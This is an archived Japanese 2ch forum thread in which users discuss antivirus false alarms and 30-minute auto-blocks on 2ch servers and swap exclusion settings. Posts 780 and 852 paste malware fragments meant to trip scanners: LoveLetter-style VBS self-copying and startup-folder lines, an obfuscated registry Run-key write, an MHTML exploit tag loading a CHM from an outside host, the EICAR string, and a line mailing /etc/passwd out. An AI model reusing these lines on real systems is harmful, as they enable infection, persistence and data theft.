X


ノートン誤作動対策本部

■ このスレッドは過去ログ倉庫に格納されています
1動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
2006/04/02(日) 03:11:11ID:DYw3aOAd0
おれもそっちは大丈夫
こっちがだめだ。875までは大丈夫だったんだけど
http://tmp6.2ch.net/test/read.cgi/download/1143304561/
2006/04/02(日) 16:52:52ID:8hEAiEMl0
>>764-766
まぁセキュリティ板行けって話だけど、AVGは有償のPro版でないと除外指定ができない。
2006/04/02(日) 16:55:22ID:YJTVT3eF0
昨日が3月32日だよ
2006/04/02(日) 16:56:11ID:YJTVT3eF0
誤爆スマソ
2006/04/02(日) 18:17:31ID:LqxABCFV0
今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う
771動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/05(水) 06:28:02ID:L6X4AuEx0
当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz

【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50


…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
2006/04/05(水) 07:24:50ID:IemTuPtY0
>>771
マカフィーも反応するんだ。そこの9スレ目で。
2006/04/05(水) 07:31:20ID:q7ZYjZaA0
>>771
とりあえず製品の不具合(ウィルスじゃないものに反応する)はマカフィーに通報でいい
774動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>771-772
マカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。
2006/04/05(水) 07:44:55ID:IemTuPtY0
>>774
いやNIS2005だけどもうすぐ切れるからマカフィーにしようかなと。
2006/04/05(水) 22:06:28ID:vTdsxxJa0
アボーソすればいいじゃん。
漏れのノートン先生は無反応になったぜ。
専ブラ使っていれば、な。
777動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/06(木) 15:48:38ID:ogl3bSVi0
NAVの場合の設定を教えてくれー

インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ?
2006/04/06(木) 20:22:55ID:A4GZFMjG0
>>777
>>727
2006/04/06(木) 20:34:03ID:ogl3bSVi0
>>778
THX

HTTP MSIE JavaScript OnLoad Rte CodeExec

って 「MS IE」と別のとこにあるのな…ないよーと思って困ってました。
780動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/07(金) 10:26:14ID:9BaGKlIFO
ms-its:mhtml:file://C:\


c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


<body onload=window()>


c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub


G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC
2006/04/07(金) 10:34:49ID:7L7IH86h0
>>780
で?
NGNG
ν速だけでも
伝書鳩
2006/04/07(金) 23:59:38ID:B6Wm8s4l0
↑なにこれ
2006/04/08(土) 05:07:05ID:yUO2NZXw0
ウィルスコードだろ
2006/04/08(土) 14:52:00ID:0n8hZvPv0
2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい
2006/04/08(土) 18:22:00ID:3ZuAlp6E0
>>75で2chは問題なくなったがしたらばがまだだめだ
2006/04/08(土) 19:33:27ID:Dfxh+7wv0
にはは、こやつめ
2006/04/09(日) 08:35:16ID:qBdtQITt0
このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?

今はNISを無効にしてカキコしています。
2006/04/09(日) 09:57:32ID:vW718YJi0
ログ読むと幸せになれるよ
2006/04/10(月) 18:40:26ID:6ukEWzx+0
>>521氏のレスを参考に汁
2006/04/10(月) 19:43:50ID:L1pXQnpL0
わかったにゃー
792788
垢版 |
2006/04/10(月) 23:20:01ID:2y1G/tIP0
>>510
>>512
>>517

これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。

>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。

で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。

2006/04/12(水) 15:42:54ID:ch5Pl/k40
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな
794動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/12(水) 16:23:57ID:QTtuslSa0
そのようだな

  ウィルスバスター蛾壊れた  
http://live22x.2ch.net/test/read.cgi/news/1144822966/
2006/04/12(水) 16:47:09ID:xZWLgV830
>>794
そしてもう対応
2006/04/12(水) 17:28:00ID:5RaY6XDD0
ああ、なんかさっきアップロードしおったのはそれか
2006/04/12(水) 18:58:07ID:1TPqXXUv0
まあ、あれだ。
アップデートとアップロードを間違えるのはここだけにしておけ。
2006/04/12(水) 20:31:16ID:5RaY6XDD0
素で間違えてた……orz
2006/04/13(木) 15:14:15ID:2EZeuwQo0
>>794
また誰かがウィルスコード貼ったのか…(泣

馬鹿フィーが大激怒 orz
800動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/15(土) 15:03:59ID:KVooKePH0
ダウン版見れないのはNISのせい?
2006/04/15(土) 15:34:28ID:28B7+P0x0
疑いを持ったなら
2006/04/15(土) 15:35:13ID:JEBS1g3C0
ノートン全部切ればわかる
2006/04/17(月) 22:27:09ID:jyqvkQIl0
道理だな。
2006/04/18(火) 01:55:50ID:jLocfvCR0
>>782はなに?
横棒と青字の伝書鳩ってなに
2006/04/18(火) 02:04:50ID:DZuh5+A/0
この板限定の機能
tasukeruyoするとuserAgent情報が表示される
でもスレ違い
Monazilla/1.00 (JaneStyle/2.23)
2006/04/18(火) 23:18:38ID:lCVacxaa0
すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
既出の問題でしたらすいません
2006/04/18(火) 23:21:27ID:cRD4gJ9i0
>>727
2006/04/19(水) 01:07:29ID:xlDAqNv20
>>807
ありがとうございます
私はノートンアンチウイルスではなくてシマンテックアンチウイルスを使ってるのですが、同じようにできるのですか?
オプションが見つからないのですが・・・
2006/04/19(水) 01:15:01ID:MYP2DCDw0
>>808
ノートンアンチウイルスの場合
オプション→インターネットワーム防止→有効にするのチェックはずしてみ
2006/04/19(水) 01:22:14ID:c9kwy/nh0
シマンテックアンチウイルスってはじめて聞いたや
ぐぐったところ企業用?
よくわからんが個人のPCにどこまで権限あるのかねぇ
2006/04/20(木) 14:40:19ID:cpaj9cKu0
>>810
説明不足ですいません、企業用のものです
一応無償でもらったノートPCなのですが・・・
ノートンに変えていいか聞いてみます
2006/04/26(水) 22:30:50ID:trBB8emg0
てst
Monazilla/1.00 (JaneStyle/2.23)
2006/04/27(木) 03:48:52ID:QJStxuh90
↑なんなのさコレ
2006/04/27(木) 03:57:17ID:ZtVWInwj0
>>813
>>805
2006/04/27(木) 04:11:59ID:vibsyTVj0
test
Monazilla/1.00 (JaneNida/060425)
2006/04/27(木) 04:19:36ID:2SuzC+KB0
[test] 書き込みテスト 専用スレッド 62 [テスト]
http://qb5.2ch.net/test/read.cgi/operate/1145833088/
817動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/29(土) 08:20:30ID:4i3tyZmJ0
また、マカフィーが大激怒…

任天堂新ハード正式名称発表その名も「wii(ウィー)」
ttp://live22x.2ch.net/test/read.cgi/news/1146155170/


…「ノートン先生」みたいに、スキャン対象から簡単に外せないんだから、ウィルスコード貼るな!


お願いしますよ orz
818動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/29(土) 09:51:08ID:v+w1epi4P
>>817
>>167
2006/04/29(土) 11:58:05ID:4i3tyZmJ0
『Exploit-MhtRedir.gen』止めて… (鬱氏
2006/05/01(月) 02:17:44ID:rDKzlRcj0
tes
Monazilla/1.00 (JaneNida/060425)
NGNG
【戦争】涼宮ハルヒED1位阻止大作戦【ν速対VIP】
http://live22x.2ch.net/test/read.cgi/news/1146579961/l50
たぶんこいつにやられた。実際食らったのは初めてだよ。
822187.72.30.125.dy.iij4u.or.jp(125.30.72.187)
垢版 |
2006/05/06(土) 02:41:29ID:y9hztnnP0
ためさせて・・
Monazilla/1.00 (V2C/T20060424)
2006/05/06(土) 11:37:58ID:Q5SbiF6F0
テストはこっちでやれや
[test] 書き込みテスト 専用スレッド 62 [テスト]
http://qb5.2ch.net/test/read.cgi/operate/1145833088/
2006/05/06(土) 13:12:03ID:AefHcCI10
あんちういるす2006の一般ルールで追加許可してもだめだ(´・ω・)ワケワカンネ
2006/05/06(土) 13:29:11ID:IDtWUQIu0
>>824
オプション→インターネットワーム防止→AutoBlockで遮断しているIPがあれば除外
→防止を有効にするのチェック外してログ取得
これでもダメ?
2006/05/06(土) 13:36:21ID:AefHcCI10
>>825
今やってみた、ダメだった(´・ω・)ccgrgfvvbtぶぐtvgfxdbcrgvf
2006/05/06(土) 13:42:19ID:AefHcCI10
>>825
あ、もう一回やってみたら大丈夫だった
828動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/13(土) 03:20:08ID:WH+6QveU0
また、コード貼った馬鹿が… orz

【国際】「麻薬の運び屋に仕立てられた」 無罪訴え続けた日本人男性、逮捕から14年で仮釈放…オーストラリア
ttp://news19.2ch.net/test/read.cgi/newsplus/1147357192/

シクシクシク
2006/05/13(土) 04:31:25ID:Wkna+nBH0
んなこといちいち報告するおのれも馬鹿じゃ
830動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/13(土) 10:31:19ID:ZNCsmQsr0
昨日あたりから板を開くとノートンが反応するんだけど、
同じ境遇の人っている?
2006/05/13(土) 10:33:30ID:gEdS6mBp0
>>830
よくある誤作動かと思います。
とりあえずノートン切ってから、ログ取得してみてください。
2006/05/13(土) 13:57:27ID:4Mz3XLyv0
ノートンを誤作動させる文字列は何年も前からあるし、シマンテックに連絡しても
これで正常と言って対策しない。
つまりシマンテックは自力で対策できる人だけ買ってくれればいいと言っている。
そんなソフトは>>167
2006/05/13(土) 18:17:51ID:MOWCA5430
AntiVirus の設定→除外→C:\Program Files\Jane\Logs
2chブラウザ使ってるならこれでいいでそ
2006/05/13(土) 23:52:46ID:MBoovNWj0
>>833
そりゃJaneの場合だろ。他の2chブラウザでも原理は同じだが。
2006/05/15(月) 18:54:17ID:PrBQtiGL0
Janeを開いたり更新をするたびに
C:\ProgramFiles\Jane Style\Logs\2ch\AA\AAサロン\subject.txt
この警告が出ます。
除外もしたり、このtxtを削除したりもするのですが効果が出ませんでした。
対処法をお願いします。
2006/05/15(月) 19:09:45ID:dDyR9/+20
>>835
ノートン?
なら、ログ除外でこのスレ見てみ。
2006/05/15(月) 19:10:13ID:NZqVc6Tk0
除外できてないから反応するんでしょ
2006/05/15(月) 19:11:15ID:oIiIaZFl0
だからノートンは使う人を選ぶんだってば
アンインストールして乗り換え
2006/05/15(月) 19:23:32ID:ykTsWDCL0
3日前から、ラウンジクラシックに入ろうとするとノートンアンチウイルス2005が反応して、
sports2鯖ごとノートンにアク禁されます。
一度踏むと30分間アク禁で、ノートン無効にしてもダメなので困ってます。

↓ログ

詳細: このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました。
侵入者: sports2.2ch.net(210.(伏せ;侵入者のIPアドレス))(http(80)).
危険度: 高
プロトコル: TCP
攻撃された IP: DEFAULT(192.(伏せ;自分のPCのIPアドレス).1).
攻撃された ポート: xxxx
             ↑ランダム

これもウイルスコードの仕業ですか。
NGNG
>839
AntiVirusじゃなくPersonal Firewallを無効にしろ。
あとついでだが、192.168.*.*は隠す必要ないから。
2006/05/15(月) 20:59:11ID:NZqVc6Tk0
ついでに2ちゃんのIPも隠す必要皆無
つうか、このスレを読めよ
2006/05/15(月) 23:01:19ID:OR0kDpbn0
>>839
NISの方は
ttp://mickey.mirv.net/2chnis.html

NAVの方は>>727
をやってみれ
843動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/20(土) 02:01:04ID:UxN9/Hbe0
N速+でまた、幾つかのスレにウィルスコード張られてるなぁ…



貼る馬鹿は、樹海池
2006/05/20(土) 02:05:26ID:LBVUZ+TP0
そんなことでこのスレあげる奴が樹海池
2006/05/20(土) 02:08:04ID:4fzoyPrc0
貼る馬鹿っつーのは、他人の家に勝手に出前送りつけたり
ピンポンダッシュして物陰からニヤニヤしながら眺めてるような奴なのかな?
マジで樹海逝ってくれ
2006/05/20(土) 02:11:27ID:I6thLW4L0
実はバスター先生の社員
2006/05/20(土) 23:05:19ID:lD4S3eJm0
てす
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
2006/05/21(日) 00:06:52ID:UlnPDZzE0
[test] 書き込みテスト 専用スレッド 63 [テスト]
http://qb5.2ch.net/test/read.cgi/operate/1147513870/
849動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/21(日) 17:58:26ID:+w8Xwl0G0
ヽ(`Д´)ノウワァァン!!
2006/05/21(日) 23:34:09ID:d0y6j7aZ0
>>849
どした、どした?
851動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 00:10:53ID:8SW5pKAP0
野豚先生のオートブロックからオカ板を救い出そうとしたんだけど、制限押しちゃった。
どうしたら制限解除できるか教えてえらい人。
2006/05/22(月) 05:24:43ID:wNSTIVWx0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
2006/05/22(月) 17:32:45ID:YSvqyftL0
>>852
それがどうした?
854動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 18:34:49ID:x/ho1oyO0
今日ノートンをつけたけど、ホントにウィルスが反応したwww
びっくりww
855動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 18:38:22ID:3PLHq1aF0
http://fm7.biz/1px
2006/05/22(月) 19:15:02ID:xJ3koXsB0
×ウィルスが反応した
○ウィルスじゃないものに誤反応した
2006/05/22(月) 23:06:13ID:ETkw1oK20
おおう・・・アンチウイルスがMSIEJAVAオンロードに反応して
このスレの対策覗けなかったぜ
ワーム防止解除でやっと見れた

少し賢くなれた気がする。自分にとって不具合がある方がなあに、かえって免疫力がつく。
そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。
2006/05/23(火) 08:29:28ID:n+xiKrcl0
>そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。

ここんとこクソワロタ。

専用ブラウザ使ってる人は、852の書き込みをそのままNGワードのリストに貼っちゃうというのも
楽かも知れないですね、とか言ってみるテスト。
2006/05/29(月) 19:33:35ID:AsWTfeTp0
このスレ開いたらキタ━━━━(゚∀゚)━━━━!!とか出た
2006/06/01(木) 08:12:48ID:3zZVmq9d0
今日反応したスレ

【日テレ隠蔽疑惑】炭谷宗佑アナを報じない日テレ、容疑否認のテレ東社員を実名報道 テレ東も即日実名で伝える★2
http://news19.2ch.net/test/read.cgi/newsplus/1148999462/

…この騒動が起きてから、幾つかの『日テレ隠蔽疑惑』関連スレに、
ウィルスコード貼ってる香具師が居るなぁ




まさか、関係者?>コード貼る馬鹿
2006/06/01(木) 14:26:23ID:42ynq1S/0
祭りのスレに貼られるのはお約束となっております
いちいち反応しないでください
862softbank220001088253.bbtec.net(220.1.88.253)
垢版 |
2006/06/01(木) 22:47:23ID:/syViJED0
どう?
Monazilla/1.00 (cockcrow/2.5.5.5)
863動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/01(木) 23:12:19ID:2pQl8VUp0
誤作動ばかり起こるセキュリソフトを使い続ける人の気が知れねwwww
864動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/02(金) 18:24:12ID:1Oq2QSVQ0
やっとここにたどり着いた。
昨日206.223.152.55に攻撃されたのはノートンのせいってこと?
何度も攻撃されてびびったよ誰か教えて。
2006/06/02(金) 18:38:48ID:NpghiVKc0
スレ嫁
2006/06/02(金) 19:43:52ID:ep2eE5W+0
>昨日206.223.152.55に攻撃された

なんで2ちゃんのサーバーがお前を攻撃するんだ?

206.223.152.55 = tiger508.maido3.com = life7.2ch.net

自己紹介 夢・独り言 生活サロン 生活全般 その日暮らし 一人暮らし 借金生活
スポーツクラブ 記念日 冠婚葬祭 育児 家具 モデル ファッション 靴 化粧 美容 美容整形
一般海外生活 北米海外生活 クレジット 家庭 懸賞 たばこ めがね マイライン コンビニ バーゲン  
ヒッキー メンヘルサロン 癒し 人生相談 心と宗教 身体・健康 アトピー アレルギー ハゲ・ズラ メンタルヘルス
■ このスレッドは過去ログ倉庫に格納されています